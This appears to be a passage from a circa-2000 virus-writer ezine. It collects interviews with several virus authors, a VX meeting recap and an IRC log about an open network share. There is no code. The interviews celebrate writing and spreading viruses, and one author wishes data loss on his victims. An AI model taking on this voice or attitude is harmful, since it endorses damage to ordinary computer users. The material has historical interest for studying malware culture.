I for example like Babylonia for the ideas, win32.crypto for its tricks with encryption. All inventive virus writers have
my respect.

How important is virus writing for you and does it have any influence on your life?

It has not such a great importance as it used to be for me, since my job consumes most time.

Are you in any other underground scene, except for VX? (hacking, phreaking..)

No, those things don't have my interest.

Do you have a real life?

Not very much, it is consumed by my work most of the time, though I might buy one if I got enough cash.

Which kind of movies and music do you like?

I like some movies like Braveheart, The Mummy, The Matrix, horror and comics. My music preference is hard rock.

Do you have any other hobbies?

I don't have many hobbies though I like reading books and sometimes I even enjoy cooking, since I now have to (can't
live on microwave food alone).

Are you married or do you have a girlfriend?

No.

Do you believe in God?


Yes, for I am my own God :-)

What's your favourite country/city?

The place I would like to be my next holiday is Curacao.

Are you getting bored yet?

No, hungry, where is the food in this pillage of papers?

What's your favourite food?

Aargh! Now questions about food while I'm starving? I like pastas and chips of course.

Do you like junk food?

By occasion, when I don't feel like cooking.

Which channel do you prefer, #vir or #virus, and why?

#virus, by lack of knowledge what the other channel is for.

What do you like most about the scene and writing viruses?

The broad scale of different people involved.

Is there anything else you want to mention?

Not right now, I'll mail you when I come to think of something.

Any greetings or hate messages?

Hate to McDonalds, for not grilling their burgers :-)

Thanks for the interview :)

You're welcome, lets have dinner , Gigabyte :-)


Interview with Raid/SLAM, about Irok

Interviewer: Gigabyte

First of all, how did you come up with the name 'Irok'?

It was named after an american car. The iroc-z camaro


I simply named it irok ;p

What about the virus are you personally most proud of?

I'm proud of the fact that avers had no idea what it's payloads did for a very long time.
some of them still have incorrect descriptions ;p

How long did it take you to write the virus?

a little over 2 weeks on/off coding

Which part was the most tricky to write?

The memory management section. It's a bitch because of all the little routines inside irok.

Do you ever base your viruses or virus payloads on your real life (something/someone you're mad at, something funny
that happened, habits, etc.), and if so, did you do this in Irok?

Yes, and yes.


Irok contains the payload which fits the mood I was in at the time of writing it.

Did you get any positive or negative reactions on the virus payload from other VXers?

I guess it was an even split.


Rhape bitched about it, but fuck him.
rather, fuck anybody who doesn't like my code. I don't care. ;p

What is, in your opinion, the most funny or idiotic comment about Irok you've seen, from AVers?

oh hehehe, one second

When internal counters of the virus reach certain values, the virus displays a message on screen. Most of this message
is from lyrics of the song 'Aenema' by band 'Tool'. We wont reproduce the message here as the song seriously needs
the Parental Advisory sticker for explicit lyrics.

Hahahahahaha

tis funny, no? :)

it sure is
Which AV was that from?
http://www.Europe.F-Secure.com/v-descs/irok.htm

Do you think Irok is better than Toadie?

hmm, no
toadie was funnier
iroks mean ;p

On which points is Irok better than other viruses, and what are its weak points?

It's better then some other viruses by default because it works as designed...
it's weak points would be the memory it requires, and it's size.
and the fact that it's not polymorphic.

Which other viruses that were in the wild at the time Irok was, or later, do you think that actually were so lame that
they weren't worth any attention at all, and which ones do you respect?

shrug...
The vbs viruses suck in my opinion.
As for respecting viruses... I'd have to respect the author of the virus, and I don't respect many people.

What do you consider the most important advantage and disadvantage compared to ASM viruses?

advantage... total control of the pc, disadvantage, takes a long time to write a good one.

How do you think most infected users caught the virus?

probably got greedy


decided to download a crack or something.

If a family member would catch Irok and he/she had no AV installed at all, no backups and he/she had caught Irok by
running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out?

Nope
I have little/nothing to do with my family.

What about friends?

I don't have many friends.


I think I know 3 people who I really consider as friends.
the rest are.. mostly acquaintances.

Do you think the fact that AVers had some trouble figuring out what exactly Irok does, had anything to do with the
language it's written in, as ASIC isn't common for viruses?

Yep
and I think perhaps they don't know asm as well as they claim.

How important is virus writing for you and did writing Irok have any influence on your life (time, effort, pride,
stress)?

Virus writing and smoking pot keep me alive.


Irok had no influence on anything. it was an accomplishment for me.

Are you planning to write any more Irok versions?

probably not.

Is there anything else you want to mention about Irok?

Yes. For those of you who got hit by it, I hope you lost everything.

Any greetings or hate messages?

Oh yes
Greetings to : heh, Nobody
Hatez goes out to: Most of you on both sides, fuck you all.
So much for political correctness eh? <g>

Thanks a lot for the interview :)


Interview with The Unforgiven

Interviewer: Gigabyte

Heya.. To start with, what do you occupy with lately?

Life. Gf, friends, work, parties and all other things you can enjoy doing while you still are a young adult.

Which of your viruses are you most proud of?

None really, don't they all suck? Immortal Riot are though responsible for quite a few really awesome viruses. Not me
in person though.

Some of your viruses were pretty destructive. How do you think about that now?

I don't really think anything about it since it's all behind me. I much rather live in the present than in the past.

Do you think the VX scene has changed a lot in all those years and do you think it was better then or now?

I am not really a part of the scene anymore but I try to lurk around and keep myself a bit updated. I'm though not
really qualified to make such a comparison.

However, I don't really think you can compare things now and then, if a person start writing viruses now, he might
fancy the scene as much I did back in 1993.

What do you think about all the Internet related viruses now and do you think there will be much more of them?

Internet based malware (viruses, worms and so on) is indeed an interesting thing and I'm certain that we'll see more
virus alike programs circulating on the net in the future.

Internet is very vulnerable and many people will target the net due to the fact that internet technology and internet
(un)security are interesting topics and if an attack is done properly, it can affect a lot of people in a very short amount
of time.

Which old viruses do you like and which new ones?

I like all viruses. It's a great thing to see that people still sit around and code things just for fun. Programming for me
and most other Immortal Riot guys is nowadays stricly business.

Which virus authors and groups do you respect?

Everyone who deserves it. Further information about this can read in our ezines called Insane Reality which all be
found at our site located at http://www.coderz.net/ImmortalRiot.

What made you decide to start Immortal Riot?

Curiousity, I think. I'm a very curious person about pretty much everyting.
How important was virus writing for you?

Compared with what? Viruswriting was a hobby, the scene were our playground and viruswriting the ticket to
acceptance.

Did you base your viruses or virus payloads on real life issues?

I based some names from real life and I got motivation from real life. Everything is about real life issues in one way or
another.

What do you think about infected users?

I think they should remove the virus.

How do you think most people caught your viruses?

Probably with anti-virus programs.

I only know one person who caught one of my viruses ([Bad Attitude]). He saw "Immortal Riot" scolling all over his
monitor and later became a very good coder and an Immortal Riot member.

Do you still occupy with computers a lot?

I work with computers, but on my spare time? Maybe an hour a week, to pay bills, write emails to friends and ex-
girlfriends and of course to annoy people with SMS :).

Is there anything else you want to mention?

Naw, not really.

Any greets or hate messages?

Greets goes to everyone who ever has been mentioned in a positive matter in Insane Reality and of course to all of
Immortal Riot. Special greets must go to Metal Militia.

Thanks a lot for the interview :)

You're welcome.
Interview with Del Armg0/MATRiX

Interviewer: EXE-Gency

Give us a short description of who you are. (Handle, interests, occupation, music, films, location, marital status etc.)

I'm 27, lot's girls and one of my nick in life is Fa, humm ... what's more...¿ I'm somebody very curious in fact... lot's
hobbys (vx, phreak, short- wave listener, role-playing-game, playing electronic music too, astronomy, ... i'm happy
when i'm learning in fact ;) Some of my favorites films are "Eraserhead", "CryingFreeman", "Buffet Froid", ... And i
luv music-band like "stereolab", "gong", "bauhaus", ... and many more !

What made you choose your handle?

lot's ppl have asked me about it... it's "simply" a name from a AD&D campaign (during 6 years!), there was a
character i played as dungeon master, she was called "Larynda Nedylene Barrisson Del'ArmgO", it was a famous
Martial Drow family, and a very fun game, so... i kept the name.

Have you ever had any previous identities in the computer underground?

nop, i was since i've starting known as Del_Armg0, but it's true for some viral experience i use sometimes another
nick... it's rare. But since the JC'Zic bust, i prefer to be discreet... sometimes.

When did you first get into computers?

I've started on a Amstrad cpc 464, and a thomson MO5 !!! Was really shit but really fun. After that i've meet the Atari
world, and it was great moment. Atari 520/1040 ST was really great. And in 1996, i've bought a PC under windows...
humm no comment!

What operating system(s) are you currently running?

I've a first 'puter with Win95, a 486 with a russian Dos (a graphic Dos) called Pts-Dos 6.70 and Win 3.1, i like it a lot.
And i'm ever using a Atari 1040 (Tos) At work i'm using Win NT, just shit! I hope i will try Win2k soon, i'm sure it
will be a great OS for Vx ;)

How and when did you first discover the computer underground?

Humm... a bit "just like that", i had bought a modem to meet or know more about Underground Electronic ppl... and
it's easy to find evil on the Net ;]

How did you first get into virus programming?

I've started coding to made virus, but i guess the first idea to made a virus come from the first discovered virus when i
was younger, it was really new. And lot's hype was made around it. It was Cpc virus, but i've forgotten the name, the
fascination is always here.. Probably some movies like "Wargames" or "Tron" are importants in the story...

Do you have an interest in the other components of the computer underground? (hack/phreak/warez etc.)

Yep. I'm a great fanatic of phreaking, it's a really great and fun "game". Phone network is full of marvellous things...
and i'm lucky, i'm now working in phone network. Hacking is cool, but sometimes too much full of "big-EGO-
people", so i prefer try it alone.

Do you consider yourself to be a criminal?

Really not ! But here in France, it's really easy to be one, and for cops i'm probably one... (drug, phreak, vx, ... it's just
fun life). But why all cool things of life are illegals !!!?¿

Do the laws in your contry make writing viruses illegal and have you had any trouble with the law in your country?

Yes, laws here are very bad for H/P/V; i've never be busted and i hope i won't be! But i'm sometimes tired to be
paranoid when i'm connected... (proxys, wingates and others anonymisers...). Sabia is probably the worst spreading i
did, and my ISP leaves me.. arrgghhhh! ... but ..but Viva phone S.E. ;)

Do your friends/family/colleagues know about your interest in the computer underground?

Yep, some of them know about it, but really few. It's bad ideas to talk about it because when u send a mail to your
friend, he's always afraid ;), and 99% of mass ppl really don't care about vx, so...

What are your opinions on virii with destructive payloads?

I never did it, cos i don't like it very much... I guess some coders are good coders, but not really imaginative... Virus
are artworks, but destruction can be art, so...why not... It's a really great and endless debate, but to my mind, a
destructive program is not really a virus. Virus must spread and spread, so why to kill the host and kill himself, in the
same time ?

How did you get involved with the Matrix virus group?

mort was a good electronic friend, some groups ask me for joining, but i was not interrested, i said it to mort, and so
he asks me to join MATRiX, this time i said "ok".

Does the Matrix group concern themselves with virus programming only or do they have an interest in other
underground topics?

Actually MATRiX concern only virus coding, but i hope i could introduce some others subjects like phreaking, trojans,
hacking, ...

Have you been a member of any other groups?

Nop, and i've never thought to be in a group, i liked to be alone; but it could be a good experience (and mort is a
really good friend).

Why did you start learning to program? Was it because you wanted to write computer viruses.

i've started to program in 1998 with Delphi, and yes i've started learning to program to write viruses/trojans. So fastly
i've learn asm, i've again to learn asm32 (i'be start). I like a lot to learn some toys or silly languages like VB, VDscript,
batch, rebol, javascript,...

What other languages can you program in?

Delphi/Pascal, Asm/Asm32 for serious coding Vba/Vbs, html/wml, and some others scripting languages, for silly
things I find Rebol very interesting too (31 platforms !!) I like Toys like PcomP, VDS, M:POSTER,...

What do you think of viruses written in languages other than assembly?


i like it! hehehe! Yes, i like all virus, worms or trojans. Some of them are really nice and ingenious but not in asm; too
much virii are variants of a variant actually, probably cos the big number of asm source on the Net.

What is the best/favourite virus you have written so far?

Wooo! Really hard...! but IRC-Worm.ElSpy.2278 & .9619 was great worm at this time, it was my really first, and they
had some cool features. i liked a lot my script generator too, called "SENSI". And my prog "Bundy" cos' the silly
splash screen.

What groups do you value most highly?

I guess 29A is one of the most prolific and original group of the present time. Perhaps even too present.. i liked
Phalcon-Skism, Immortal Riot, SLAM ... but it's a bit old..skool

Which individual programmers (both past and present) do you value most highly?

Wooo, really hard to answer! But i like legend like DarkAvenger and stories like that. Bulgarian Myth is great. The
text about it are nice novels

What zines do you read regularly?

Really a lot! I read almost all E-zines about Vx and Phreaking, i read some french Hacking zines too.
(www.madchat.org) Cool H/P zines are PyroFreak, IGA, Hackoff, ... ... ... For Vx Zines, 29A & Vxtasy are perhaps the
bests (after MATRiX zine, of course:)

What do you think of the virus scene? (Both in general and in your own country.)

I know well the vx trading scene, and there is too much politics... About vx scene, it's a cool place, but too much
young people don't want to see that in vx coding there's an EGO part. Hahahaha! I have some electronic friends, but
i'm sometimes a bit away from vx scene.

How has the underground scene changed since you first entered? Scene has changed yes, but scene changed so fastly.
Guy appears, disappears,... But since the beginning i've kept some good electronic friend in vx scene, it's enough for
me. (booohh Phage!;(

What do you think the future of virus writing holds?

It will depend on different things, like OS. If Linux becomes the main OS it will be a revolution for vxers, probably the
scene will be totally changed. And more networks and networking application appear, more worms come too. So future
of virus is more in the hand of mass ppl than in our hands.

Do you believe in a 'perfect virus'? And if so describe it.

A Worm of course :), Joke! But i believe really that the future of the virus is in the worm properties, The next
generation of viral code must have abilities to infect the new hardwares (like mobil-phone) and spread using new
protocols. WAP network, GRPS and UMTS protocol will be used by phone and tiny computer, the virus will have to
use worm technics to spread between phones, computers and other palm & psion. I like the idea of a Autonomous
Mobile Cyber Weapon (AMCW) too. The perfect virus will have to use main worm features, will know and find his
target and infecting files traded by network user (like pictures, ...yes my dream will be to infect .jpg :)

What advice would you give to newbies entering the virus scene?

download, print, read, download, print, read, download, print, read, ... After 6 months like that, come on Irc to meet
some ppl and code, code, code, ... A good thing is really to learn the maximum possible things, learn some languages,
learn about OS, learn about protocol, learn about people, learn, learn, learn, ...

What language should a newbie learn if he wants to start writing viruses?

It depends really of the newbie, learn Asm first is good to learn some universal maths/coding theories, after Asm all
others languages seems easy, hehehe. But the better thing to do is to try all, to learn again and again. All languages are
good if u know really this language, the hardest is perhaps to find THE language.

Anything you would like to add?

I guess no, lot's things have been said. And i'm not somebody very talkative (gossipy?) cya.

Any greets?

Yes a lot!!! Greets to : Phage, Perikles, VirusBust, MATRiX team, HomeSlice, Daniel3 Lyskovick, Secret_- Trov,
ArteMuse, pbat, mort, Ultras, NBK, TGR, LordDark, Anaktos U, Iblis, W0de, FreDyKrug, Elsa, MelanYe,Roadkill,
Zulu, Mist, Urgo32, me, hashish, all!

Any plugs? (Homepage, email address etc.)

Sure !
mailto: delly@fr.st
http://www.delly.fr.st
http://www.coderz.net/matrix
VX meeting 2000 in Czech Republic:
Opinions of a few VXers

Interviewer: Gigabyte

First week of August, quite sunny, boring IRC channels.. the ideal moment for the yearly VX meeting. While
AVers were probably thinking all VXers were sitting in their rooms, with a computer, avoiding the sun and
giving dumb users a hard time by writing new viruses, some of us were in fact having a great time in Brno,
Czech Republic, getting drunk, stoned, even getting some suntan and sticking 'GriYosoft' papers all over the
city. If we still remember anything? I sure do! Lets see what the guys have to say..

Did you enjoy the meeting?

GriYo: Oh, if... I always enjoy in all the meetings that we organize in summer.
I always find there great dudes ( and dudettes :-P ) and also new places, so i can get my hands out of the keyboard for
some days.

Benny: ABSOLUTELY YES!!! I can say it was one of the best timez in this year... you dont think so?

mort: sure, i met ppl who i've seen only on chat

Ratter: of course. it was my first VX meeting in my life and i met great ppl there which i knew only on Internet. It was
a great time for me. One of the best in my life...

Did there happen anything funny that you remember?

GriYo: I had fun one day we went to a big park in Brno... I had brought a little bit of hashish from Spain, and we
were smoking... We don't take in beginning to say foolishness and to laugh without stopping, it was really funny.

Benny: Yeah, sure. GriYosoft action. all city was full of posters :) and i will never forget how you, GigaByte, got
absolutely stoned and drunk, hehe.

mort: yea,... giga and beer :)

Ratter: yeah of course :) talking with you Gig XD

Anything you missed there?

GriYo: Mmmmm... no.


Benny: Yeah, I expected there will come more ppl from foreign countries. nevertheless, it was really very kewl
meeting, I had really fun.

mort: more ppl

Ratter: yeah i missed darkman there. and other ppl that do VXing
How often did you have a hangover?

GriYo: Well, we had a hangover every morning... I thought that i was accustomed to drink a lot of beer, but I was
wrong, eh Benny? ;-))))

Benny: almost every morning...:P but three or four beerz in the morning helped me a lot to forget :)

mort: hehe,... no comment

Ratter: I don't have hangover after weed :) and i didn't drink a lot
Kevin & Kell

Bill Holbrook
What follows is the result of a run in I had with a seriously stupid
IRCop of Undernet. If you the reader doesn't know or understand shared
drives and net.exe, This entire file will be one boring read for you.
For the rest of us, It's funny as hell... Definatly a keeper if I do say
so myself :]

I don't have the logfile handy of my original conversation with


chaplain, nor the Logfile earlier that day this shit went down, because
I don't log from work. I turned on buffer save after CiCi made her
threat, otherwise I wouldn't have proof of that either. However, I do
have some wonderful emails; and the entire log of CiCi and myself
chatting the next day. Now then, on with the show...

Start of #Christian buffer: Fri Sep 08 16:14:38 2000


ne.no) has joined #Christian
<Latte> hello :)
<TremorX> Hiya
<chatcat> i need chocolate
<Latte> how are u
<TremorX> Great.. yourself?
<chatcat> gotta go look throuhg all
the chcoclate stashes i know about
<chatcat> laters
*** chatcat has quit IRC (*MEOW*FWACK*H
ISS*WHACK* "you're right... there
ISN"T enough room to swing a cat in
here...")
*** ionxy has quit IRC (Ping timeout
for ionxy[194.102.79.136])
<Latte> some down, my late wife's
brother passed away last nigt
*** AxeAshes has quit IRC (Baltimore-R.
MD.US.Undernet.Org Seattle.WA.US.UnderN
et.Org)
<TremorX> That's a shame... it's
always hard to lose someone you're
close to.
<Latte> yes it is, it was cerebral
haemorrhage if you understand my
english
<TremorX> Yeah
*** AxeAshes (AxeAshes@63.160.115.29)
has joined #Christian
<Latte> but what people tell us, they
say life must go on, they said that
to me when my wife passed away
<TremorX> The problem with that would
be trying to get your Mass Air
Sensor to register properly. I
suppose it COULD be done, but you'll
need to add at least a small section
of pipe where you can mount it, and
then you run a chance of the airflow
being wrong. Of course, you could
always acquire another stock airbox,
do some cutting, get some hosing and
try it. No harm in trying, so long
as your car still works if you mess
up!
<TremorX> --TremorX
<TremorX> ack!
<TremorX> sorry
<TremorX> good thing that's all that
was on my clipboard :P
<TremorX> j/k
* TremorX drops a pin
<patience_> hehe
-> *lc* You think a lawyer is going to
help you bro? Open shares is your
problem...
*** chatcat (~chatcat@kruse.fwi.com)
has joined #Christian
*** Nuts (dnut@P29.ASC-MB06.QZN.SKYINET
.NET) has joined #Christian
<JadeGA> l8r :)
<TremorX> Bye hon
<TremorX> *smooch*
<JadeGA> see in little while ;)
<TremorX> ya
*** JadeGA (Jade@pm2-34.btconline.net)
has left #Christian
<ZoOrOpA> husband and wife?
<TremorX> Not yet :)
<TremorX> Close enuff tho
*** Latte has quit IRC (Leaving)
*** Latte (hpg@ti02a22-0125.dialup.onli
ne.no) has joined #Christian
*** Nuts has quit IRC (Ping timeout
for Nuts[P29.ASC-MB06.QZN.SKYINET.NET])
*** Nuts (dnut@216.250.192.17) has
joined #Christian
*** TremorX has quit IRC (Connection
reset by Janet Reno)
*** chatcat has quit IRC (Ping timeout
for chatcat[kruse.fwi.com])
*** Melv\Mike (~oldage@p152-tnt1.ham.ih
ug.co.nz) has joined #Christian
*** JnetyBabe (CollegeGrL@dialup-63.212
.138.179.LosAngeles1.Level3.net) has
joined #Christian
<JnetyBabe> can anyone tell me where
to look in the bible......
<JnetyBabe> where it talks about
sucide and how it makes you go to
hell ?
<Raid> I think if you commit suicide
you'll goto hell for it, yes.
<Raid> But don't quote me on it, I
don't know for sure.
<patience_> it doesnt talk about
suicide specifically
*** AxeAshes has quit IRC (<<-NE><GEN·A
CiDMAX->> ©1998, KnightFal www.europa.c
om/~colin)
<Raid> patience_: the bible seems to
have a real problem with specifics...
<patience_> not all the time
<patience_> only a few things
<Raid> a few things?
<Raid> according to the bible patience,
how old is this planet?
<Raid> a few thousand years?
<patience_> in my opinion
<patience_> wel *i* think about 10000
years or so
<patience_> i'm not exactly sure
<Raid> 10,000 years eh?
<patience_> but theres no verse in the
bible that says " the earth is so
many years old"
<Raid> Geological Science says she's a
hell of a lot older then that.
<patience_> Raid maybe a couple 1000
less
<patience_> ya well
<Raid> by a few million years or so.
* patience_ needs food
<patience_> well i dont believe that
<Raid> We know alot more now then we
did in the 1800s :)
<Raid> Do you believe dinosaurs roamed
the earth at one point?
<patience_> they could very well have
<patience_> cos they couldda gotten
destroyed in the flood
<Raid> could?
<Raid> ehm.. No
<Raid> they did.
<ZoOrOpA> Raid:my mother in law does
* patience_ cant debate because i dont
have enough knowledge
<ZoOrOpA> j/k
<ZoOrOpA> j/k
<Raid> DIdn't god claim we were the
first?
<patience_> you calling your motheri n
law a dinosaur? lol
<Raid> Well, how can we be the first
on this planet, if the dinosaurs
were here and long gone?
<ZoOrOpA> patience_"im not married...i
was trying to be funny
<ZoOrOpA> ;]
<Raid> adam and eve, then they furry
little animals...
<Raid> No mention of dinos..
<Raid> Yet, we have real evidence that
they existed.
<pSyk_> lol
<patience_> heh
<Raid> like there huge skeleton
remains, and the fuel I paid almost
2.00 a gallon that runs my truck.
<pSyk_> RaidSTX:STX don't forget, xians
don't understand that carbon dating
is valid.
<patience_> well God didnt name every
single creature He created in Genesis
*** CookieMix (HS17pro@host212-140-40-3
2.btinternet.com) has left #Christian
*** `Pegasus (Nons@HSE-QuebecCity-ppp82
042.qc.sympatico.ca) has joined
#Christian
<pSyk_> maybe dinos died out after
jesus was crucified.
<Raid> But he did specifically say We
were first right?
<`Pegasus> hi a;;
<`Pegasus> hi all
<patience_> hi `Pegasus @
<Raid> The dinosaurs have been LONG
gone.
<patience_> umm
<patience_> God created animals maybe
first
<pSyk_> yes he did.
<`Pegasus> hi patience :)
<pSyk_> no no
<pSyk_> read the genesis
<patience_> but we were around too i
reckon
<patience_> anyway
<`Pegasus> Psyk: You still here?
<pSyk_> god said he created man frist
than woman than animals
<Raid> patience_: What about cave men?
<patience_> we all have our own
opinions
<Raid> patience_: You can't claim this
is my opinion, Dinosaurs roamed this
planet.
<pSyk_> they found human remains that
date 40,000 years ago...
<`Pegasus> Hi zooropa!
<Raid> it's a fact.
<ZoOrOpA> `Pegasus :]
<Raid> Fossil fuel...
<patience_> well they SAY they are
40000 years old
<patience_> i dont believe it
<patience_> ANYWAY moving on....
<pSyk_> haha
<Raid> real skeletons, some complete.
<Raid> patience_: Not moving on, I
like this topic.
<pSyk_> patience_ why not? have you
researched carbon dating techniques?
<Raid> and there isn't anything wrong
with this topic...
<Raid> it's legit.
<patience_> well i've heard that they
can be wrong
<pSyk_> patience_ do you think you are
brighter than the scientific
community which relys on carbon
dating?
<patience_> i heard of particular
incidents
<patience_> pSyk_ i didnt say i was
<patience_> i believe God
<Raid> patience_: Where do you believe
the gas you put in your car comes
from?
<patience_> anywho
<patience_> i'm starvinh hungy
*** Latte (hpg@ti02a22-0125.dialup.onli
ne.no) has left #Christian
<patience_> need some food
<Raid> question too difficult to
answer or something?
<Nuts> eat well patience
<patience_> i just dont feel like
answering em either
* pSyk_ shrugs.
<patience_> but its almost 10pm and i
havent had supper
<CiCi> Raid you're about to get your
lil tail in alot of trouble from
what I'm seeing
<pSyk_> patience_ it's ok. there is no
way you can answer that question and
have faith in god at the same time.
<CiCi> I suggest you stop threatening
people with attacks before I remove
you from Undernet
<Raid> patience_: A science lesson for
you. The fuel our cars run on is
from rotted dino bones. Which took
millions (not thousands) of years to
produce.
<Raid> CiCi: for?
<Raid> CiCi: Ehh, Who have I threatened
?
-> *CiCi* enlighten me, Whom have I
threatend since I've been here?
*** patience_ is now known as pataway
*** dreamweb has quit IRC (Ping
timeout for dreamweb[213.108.36.228])
<CiCi> Raid you may only be a teenager,
but you've no involved yourself in
a problem with the authorities
<CiCi> I'll let them handle it, but a
word of advice would be to judge who
you threaten more carefully
<Raid> CiCi: Listen, I'm not a
teenager.. and I don't think the
authorities are going to do anything
about me.
<Raid> CiCi: But if you know something
I don't, I;d like to know about it.
<CiCi> Raid when you threaten to do
damage to someone's computer system,
and you dare them to take legal
action, rest assured, they WILL do
that
<CiCi> and don't act like you have no
clue what's going on here
<CiCi> that's the end of my discussion
with you, you can talk to an attorney
*** CiCi (~ci@fearnot.iadfw.net) has
left #Christian
<pSyk_> wow
*** RoadRunnr (~Nessa@p232-tnt8.akl.ihu
g.co.nz) has joined #Christian
<Raid> uh huh
<pSyk_> ud' think god came down and
shoved a red hot poker up his
bummhole
*** MarySue (abbi@p113-tnt1.ham.ihug.co
.nz) has joined #Christian
<Raid> I didn't threaten him, He had a
real open share on his box.
*** logos3 sets mode: +o RoadRunnr
<Raid> thats HIS fault, jerk
<pataway> allrighty pSyk_
*** dreamweb1 (~peter@213.108.39.116)
has joined #Christian
<pataway> i think u should leave
<`Pegasus> hi Road!
<RoadRunnr> hi..
-> *dan_* what the fuck is with cici?
*** pSyk_ was kicked by RoadRunnr
(pSyk_)
<pataway> hi roady
*** pSyk_ (psyk@endless.efortress.com)
has joined #Christian
*** RoadRunnr sets mode: +b *!*@endless
.efortress.com
*** pSyk_ was kicked by logos3 (Banned)
<dan_> *s*
<`Pegasus> thanks rr!
*** Karentra (karentras@A020-0276.TAMP.
splitrock.net) has joined #Christian
<pataway> ta roady
*** Karentra (karentras@A020-0276.TAMP.
splitrock.net) has left #Christian
*** RoadRunnr sets mode: -o RoadRunnr
<pataway> i would ahve done the honors
myself but logos well.... yah
<RoadRunnr> what a way to start the
day..
<Raid> I don't beleive this BS...
<pataway> hi MarySue !!!!
* pataway willl BBL
<Raid> I tell somebody they have a
security problem, and I'm reported
to the authorities?
<MarySue> patience : ))
<pataway> Raid i think she referred to
what you said to LC when you were
here earlier
-> *cici* You want my logs of christian
? I didn't threaten your friend
chap. I told him he has an open
share and he's vulnerable, I did
nothing to his computer.
<RoadRunnr> eh?
<Raid> pataway: HE has an open acccess
to his computer, Ok?
<pataway> anywho
<pataway> she = CiCi
<Raid> pataway: With that, anybody can
access his hard disk.
<`Pegasus> what?
<RoadRunnr> Raid, are you saying what
i think you are saying?
*** MarySue is now known as MarySafk
<ZoOrOpA> DAN!!!!!!!!!
<RoadRunnr> we don't tolerate threats
in here
<Raid> RoadRunnr: grrrr.
<Melv\Mike> MarySafk
<Raid> RoadRunnr: damnit dude, listen
to me. I warned chap he had an open
share; I didn't DO ANYTHING TO HIM.
<ZoOrOpA> dan_?
<Melv\Mike> RoadRunnr: Oh yeah? what
are you going to do about it?
<`Pegasus> Are you guys saying he can
access my HD?
<RoadRunnr> okay, lets move on then :)

<Raid> `Pegasus: If you had an open


share, anybody could.
<pataway> i dunno what an open share
is lol
<`Pegasus> Raid: what port does that
use?
*** Pipetobak (Beard@as1-dial94.flnt.mi
.voyager.net) has joined #Christian
<Pipetobak> Yo!
<Pipetobak> !rsv lev 16 13
<`Pegasus> hi
<logos3> Pipetobak: Lev 16:13 "13 and
put the incense on the fire before
the LORD, that the cloud of the
incense may cover the mercy seat
which is upon the testimony, lest he
{die;}" (RSV)
* Pipetobak reaches into the breast
pocket of his flannel shirt and
extracts a well worn, and well
appreciated briar pipe. Meticulously
he fills the pipe with delightful
crumbles of leaf and gripping the
stem of the pipe with his teeth, he
strikes a match. The creamy, dense,
vanilla tinted smoke is rich and
delightful and he inhales it deeply
with relish as he glances about
looking for interesting conversation.
<Pipetobak> Peg!
<`Pegasus> hi pipe
<RoadRunnr> hiya Pipetobak
<Pipetobak> Roadrunner!
<RoadRunnr> Raid, how have you been
anyhow?
[`Pegasus:#Christian PING]
*** ZoOrOpA (ash@ak-d156.actrix.co.nz)
has left #Christian
<`Pegasus> anyone?
<Nuts> huh?
<`Pegasus> ok :)
<`Pegasus> I tought I was alone
<Nuts> you're with a nut
<RoadRunnr> lol
<RoadRunnr> and a RR
<RoadRunnr> but i am not staying
<Nuts> hehe
*** i8dog (thouartgod@supernal.godsey.n
et) has joined #Christian
<`Pegasus> lol
<Raid> RoadRunnr: Pretty good, But I'm
losing my opinion of the undernet
ircops intelligence.
<i8dog> hello good people of CHRIST.
<`Pegasus> uh oh
<Raid> no offense dan ;p
<`Pegasus> i8dog?
<i8dog> hello
<RoadRunnr> is dan awake ?
<`Pegasus> whats wrong?
<`Pegasus> I see
<RoadRunnr> hmm?
<RoadRunnr> whats wrong?
<`Pegasus> Raid: Thats not very nice
to say
*** MarySafk is now known as MarySue
* i8dog opens the bible and starts
reading.
*** Kozubchik (orthodox@166.82.142.145)
has joined #Christian
<RoadRunnr> lets move on from that,
okay
<`Pegasus> wb marysue
<RoadRunnr> hiya MarySue, i8dog and
Kozubchik
<i8dog> hello roadrunnr.
<Kozubchik> Hey Road
* i8dog reads fevershly looking for
answers.
<MarySue> *Hugs* RoadRunnr
* RoadRunnr ain't staying.. am on the
expensive isp
<`Pegasus> You know what guys, this
place is getting too weird today. I
think Im gonna come back later.
<RoadRunnr> just sending some mail
<`Pegasus> God Bless you all
<RoadRunnr> bye pegasus !
<`Pegasus> bye bye RR
*** `Pegasus (Nons@HSE-QuebecCity-ppp82
042.qc.sympatico.ca) has left #Christia
n
*** atman` (surge@129.137.133.233) has
joined #Christian
<i8dog> take care peg... don't let the
yellow dots make your head purple.
<atman`> anyone ever hear from Petrus,
who used to hang out here?
<MarySue> atman` !!!!!!!!!!
<RoadRunnr> yeah, he still pops in
* RoadRunnr double blinks.. atman?!
<RoadRunnr> *logos3* petrus was last
on IRC channel #christian 2 days, 18
hours, 11 minutes ago.
* JnetyBabe wakes up
<atman`> hi RR
<i8dog> raid rules.
<MarySue> atman` he's here every now
and then
<atman`> ah, ok, just was thinking
about him :) Thanks!
<Kozubchik> Pray unto God for Thumps
and his Loved Ones, O holy God
Pleaser St Michael the Archangel,
for we all need to fervently flee
unto thee, the speedy helper and
intercessor for our souls.
<JnetyBabe> later all...
*** JnetyBabe (CollegeGrL@dialup-63.212
.138.179.LosAngeles1.Level3.net) has
left #Christian
<MarySue> atman` I think Colin^ talked
with him a couple of days ago : )
<atman`> thanks Marysue & RR
<atman`> :)
<MarySue> <---- is abbigail, remember
me, atman`???
*** atman` (surge@129.137.133.233) has
left #Christian
<MarySue> guess he does ... lol
<MarySue> ; )
<RoadRunnr> lol.. wierd
End of #Christian buffer Fri Sep 08 16:14:38 2000

The next Day, I begin to talk to her.. Here's that log. :)


I dub this, "The undernet funny"

Session Start: Fri Sep 08 23:01:35 2000


Session Ident: CiCi (~ci@fearnot.iadfw.net)
>/whois cici
CiCi is ~ci@fearnot.iadfw.net * God Can!
CiCi on #christian
CiCi using dallas.tx.us.undernet.org www.airmail.net
CiCi is an IRC Operator
cici End of /WHOIS list.

<CiCi> why?
<Raid> I don't think you quiet understand what you erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do anything to him, I told him it was
there; I even directed him to a website for zone alarm. (firewall; fixes that problem)
<Raid> I told him if I was a jerk as he said, I would have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody; even you.
<CiCi> ok, let me go read these logs again with that in mind, brb
<Raid> So when I'm contacted by the authorities, (they already know about this serious
security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had
